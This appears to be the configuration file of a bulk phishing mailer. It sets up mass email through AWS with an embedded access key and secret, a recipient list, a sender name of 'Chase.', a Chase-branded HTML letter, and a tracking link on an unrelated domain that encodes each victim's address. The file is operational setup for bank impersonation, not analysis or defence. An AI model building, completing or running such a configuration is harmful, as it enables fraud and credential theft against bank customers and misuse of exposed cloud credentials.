# aws config
region = 'us-east-2'
aws_key = 'AKIAIAP2N2ACW46WONTQ'
aws_secret = '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'

# email list file
mailist = 'email.txt'

# From
fromtype = 'manual' # change to auto for auto from mail
frommail = ['smart@alphagrupo.com']
fromname = ['Chase.']

# Letter
link = 'https://ktln.atmentecnologia.com.br/{email_base64}'
# link = ''
letter = 'letter/chase.html'
subject = ['Info for customer id #{randomnum_6}']
charset = 'UTF-8'
lettertype = 'Html'
attachment = False # change to False to disable it

# sender config
sleep = 1
tread = 14
debug = True
duplicate = True # enable to send double email

# email validator
# this feature is supported for hotmail only
validate_email = False
